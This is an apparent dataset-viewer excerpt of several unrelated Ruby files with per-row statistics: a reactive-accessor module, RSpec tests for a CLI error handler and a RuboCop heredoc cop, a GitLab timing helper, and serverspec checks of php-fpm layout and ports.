end
end
end
| 21.864865 | 86 | 0.606922 |
f71d5ea89e5c520c0b224437b355e58a9596aa9e | 1,253 | module Volt
module ReactiveAccessors
module ClassMethods
# Create a method to read a reactive value from an instance value. If it
# is not setup, create it so it can be updated through the reactive value
# at a later point.
def reactive_reader(*names)
names.each do |name|
var_name = :"@#{name}"
define_method(name.to_sym) do
value = instance_variable_get(var_name)
__reactive_dependency_get(name).depend
value
end
end
end
def reactive_writer(*names)
names.each do |name|
var_name = :"@#{name}"
define_method("#{name}=") do |new_value|
instance_variable_set(var_name, new_value)
__reactive_dependency_get(name).changed!
end
end
end
def reactive_accessor(*names)
reactive_reader(*names)
reactive_writer(*names)
end
end
def self.included(base)
base.send :extend, ClassMethods
end
def __reactive_dependency_get(var_name)
value_dep = instance_variable_get(:"@__#{var_name}_dependency")
value_dep ||= instance_variable_set(:"@__#{var_name}_dependency", Dependency.new)
end
end
end
| 26.104167 | 87 | 0.618516 |
f7b989bdb9dc0d7e1bc5818c33eb077ae14e683a | 8,001 | # frozen_string_literal: true
require "project_types/script/test_helper"
describe Script::UI::ErrorHandler do
describe ".display_and_raise" do
let(:failed_op) { "Operation didn't complete." }
let(:cause_of_error) { "This is why it failed." }
let(:help_suggestion) { "Perhaps this is what's wrong." }
subject do
Script::UI::ErrorHandler.display_and_raise(
failed_op: failed_op, cause_of_error: cause_of_error, help_suggestion: help_suggestion
)
end
describe "when failed operation message, cause of error, and help suggestion are all provided" do
it "should abort with the cause of error and help suggestion" do
$stderr.expects(:puts).with("\e[0;31m✗ Error\e[0m")
$stderr.expects(:puts).with("\e[0m#{failed_op} #{cause_of_error} #{help_suggestion}")
assert_raises(ShopifyCli::AbortSilent) do
subject
end
end
end
describe "when failed operation message is missing" do
let(:failed_op) { nil }
it "should abort with the cause of error and help suggestion" do
$stderr.expects(:puts).with("\e[0;31m✗ Error\e[0m")
$stderr.expects(:puts).with("\e[0m#{cause_of_error} #{help_suggestion}")
assert_raises(ShopifyCli::AbortSilent) do
subject
end
end
end
describe "when cause of error is missing" do
let(:cause_of_error) { nil }
it "should abort with the failed operation message and help suggestion" do
$stderr.expects(:puts).with("\e[0;31m✗ Error\e[0m")
$stderr.expects(:puts).with("\e[0m#{failed_op} #{help_suggestion}")
assert_raises(ShopifyCli::AbortSilent) do
subject
end
end
end
describe "when help suggestion is missing" do
let(:help_suggestion) { nil }
it "should abort with the failed operation message and cause of error" do
$stderr.expects(:puts).with("\e[0;31m✗ Error\e[0m")
$stderr.expects(:puts).with("\e[0m#{failed_op} #{cause_of_error}")
assert_raises(ShopifyCli::AbortSilent) do
subject
end
end
end
end
describe ".pretty_print_and_raise" do
let(:err) { nil }
let(:failed_op) { 'message' }
subject { Script::UI::ErrorHandler.pretty_print_and_raise(err, failed_op: failed_op) }
describe "when exception is not in list" do
let(:err) { StandardError.new }
it "should raise" do
assert_raises(StandardError) { subject }
end
end
describe "when exception is listed" do
def should_call_display_and_raise
Script::UI::ErrorHandler.expects(:display_and_raise).once
subject
end
describe "when Errno::EACCESS" do
let(:err) { Errno::EACCES.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when Errno::ENOSPC" do
let(:err) { Errno::ENOSPC.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when Oauth::Error" do
let(:err) { ShopifyCli::OAuth::Error.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when InvalidContextError" do
let(:err) { Script::Errors::InvalidContextError.new('') }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when InvalidConfigProps" do
let(:err) { Script::Errors::InvalidConfigProps.new('') }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when InvalidScriptNameError" do
let(:err) { Script::Errors::InvalidScriptNameError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when NoExistingAppsError" do
let(:err) { Script::Errors::NoExistingAppsError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when NoExistingOrganizationsError" do
let(:err) { Script::Errors::NoExistingOrganizationsError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when NoExistingStoresError" do
let(:err) { Script::Errors::NoExistingStoresError.new(1) }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when ScriptProjectAlreadyExistsError" do
let(:err) { Script::Errors::ScriptProjectAlreadyExistsError.new('/') }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when InvalidExtensionPointError" do
let(:err) { Script::Layers::Domain::Errors::InvalidExtensionPointError.new('') }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when ScriptNotFoundError" do
let(:err) { Script::Layers::Domain::Errors::ScriptNotFoundError.new('ep type', 'name') }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when AppNotInstalledError" do
let(:err) { Script::Layers::Infrastructure::Errors::AppNotInstalledError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when AppScriptUndefinedError" do
let(:err) { Script::Layers::Infrastructure::Errors::AppScriptUndefinedError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when BuildError" do
let(:err) { Script::Layers::Infrastructure::Errors::BuildError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when DependencyInstallError" do
let(:err) { Script::Layers::Infrastructure::Errors::DependencyInstallError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when ForbiddenError" do
let(:err) { Script::Layers::Infrastructure::Errors::ForbiddenError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when GraphqlError" do
let(:err) { Script::Layers::Infrastructure::Errors::GraphqlError.new([]) }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when ScriptRepushError" do
let(:err) { Script::Layers::Infrastructure::Errors::ScriptRepushError.new('api_key') }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when ShopAuthenticationError" do
let(:err) { Script::Layers::Infrastructure::Errors::ShopAuthenticationError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when ShopScriptConflictError" do
let(:err) { Script::Layers::Infrastructure::Errors::ShopScriptConflictError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when AppScriptNotPushedError" do
let(:err) { Script::Layers::Infrastructure::Errors::AppScriptNotPushedError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
describe "when ShopScriptUndefinedError" do
let(:err) { Script::Layers::Infrastructure::Errors::ShopScriptUndefinedError.new }
it "should call display_and_raise" do
should_call_display_and_raise
end
end
end
end
end
| 33.061983 | 101 | 0.650669 |
b974b8a7e8a78f4615e00f900327524682277709 | 1,386 | require 'logger'
require_relative 'gitlab_config'
require_relative 'gitlab_logger'
module GitlabMetrics
module System
# THREAD_CPUTIME is not supported on OS X
if Process.const_defined?(:CLOCK_THREAD_CPUTIME_ID)
def self.cpu_time
Process.
clock_gettime(Process::CLOCK_THREAD_CPUTIME_ID, :millisecond)
end
else
def self.cpu_time
Process.
clock_gettime(Process::CLOCK_PROCESS_CPUTIME_ID, :millisecond)
end
end
# Returns the current monotonic clock time in a given precision.
#
# Returns the time as a Fixnum.
def self.monotonic_time
Process.clock_gettime(Process::CLOCK_MONOTONIC, :millisecond)
end
end
def self.logger
$logger
end
# Measures the execution time of a block.
#
# Example:
#
# GitlabMetrics.measure(:find_by_username_duration) do
# User.find_by_username(some_username)
# end
#
# name - The name of the field to store the execution time in.
#
# Returns the value yielded by the supplied block.
def self.measure(name)
start_real = System.monotonic_time
start_cpu = System.cpu_time
retval = yield
real_time = System.monotonic_time - start_real
cpu_time = System.cpu_time - start_cpu
logger.debug("metrics: name=#{name.inspect} wall_time=#{real_time} cpu_time=#{cpu_time}")
retval
end
end
| 24.315789 | 93 | 0.694084 |
ff972d0639ff336474ff1f87886e302461a0dd00 | 1,229 | # frozen_string_literal: true
RSpec.describe RuboCop::Cop::Layout::ClosingHeredocIndentation do
subject(:cop) { described_class.new(config) }
let(:config) do
RuboCop::Config.new('Layout/ClosingHeredocIndentation' => cop_config)
end
let(:cop_config) { { 'Enabled' => true } }
it 'accepts correctly indented closing heredoc' do
expect_no_offenses(<<-RUBY.strip_indent)
class Test
def foo
<<-SQL
bar
SQL
end
end
RUBY
end
it 'registers an offence for bad indentation of a closing heredoc' do
expect_offense(<<-RUBY.strip_indent)
class Test
def foo
<<-SQL
bar
SQL
^^^^^ `SQL` is not aligned with `<<-SQL`.
end
end
RUBY
end
describe '#autocorrect' do
it 'corrects bad indentation' do
corrected = autocorrect_source(<<-RUBY.strip_indent)
class Test
def foo
<<-SQL
bar
SQL
end
end
RUBY
expect(corrected).to eq <<-RUBY.strip_indent
class Test
def foo
<<-SQL
bar
SQL
end
end
RUBY
end
end
end
| 20.830508 | 73 | 0.545159 |
33109ae98c61fb6a03a32d59b893a60691e45c85 | 2,001 | shared_examples 'php-fpm::layout' do
it "should have local php-fpm layout" do
expect(file("/opt/docker/etc/php")).to be_directory
expect(file("/opt/docker/etc/php/fpm")).to be_directory
expect(file("/opt/docker/etc/php/fpm/pool.d")).to be_directory
expect(file("/opt/docker/etc/php/php.ini")).to be_file
expect(file("/opt/docker/etc/php/fpm/php-fpm.conf")).to be_file
expect(file("/opt/docker/etc/php/fpm/pool.d/application.conf")).to be_file
end
end
shared_examples 'php-fpm5::layout' do
it "should have local php-fpm 5.x layout" do
if $testConfiguration[:phpOfficialImage]
expect(file("/usr/local/etc/php-fpm.d")).to be_symlink
elsif os[:family] == 'redhat'
expect(file("/etc/php-fpm.d")).to be_symlink
elsif ['debian', 'ubuntu'].include?(os[:family])
expect(file("/etc/php5/fpm/pool.d")).to be_symlink
end
end
end
shared_examples 'php-fpm7::layout' do
it "should have local php-fpm 7.x layout" do
if $testConfiguration[:phpOfficialImage]
expect(file("/usr/local/etc/php-fpm.d")).to be_symlink
elsif os[:family] == 'redhat'
expect(file("/etc/php-fpm.d")).to be_symlink
elsif ['debian', 'ubuntu'].include?(os[:family])
expect(file("/etc/php/7.0/fpm/pool.d")).to be_symlink
end
end
end
shared_examples 'php-fpm::listening::public' do
describe port(9000) do
it "php-fpm should be listening", :retry => 10, :retry_wait => 3 do
should be_listening.on('::').or(be_listening.on('0.0.0.0'))
end
end
end
shared_examples 'php-fpm::listening::local-only' do
describe port(9000) do
it "php-fpm should be listening local", :retry => 10, :retry_wait => 3 do
should_not be_listening.on('0.0.0.0')
should_not be_listening.on('::')
should be_listening.on('::1').or(be_listening.on('127.0.0.1'))
end
end
end
| 36.381818 | 82 | 0.617691 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.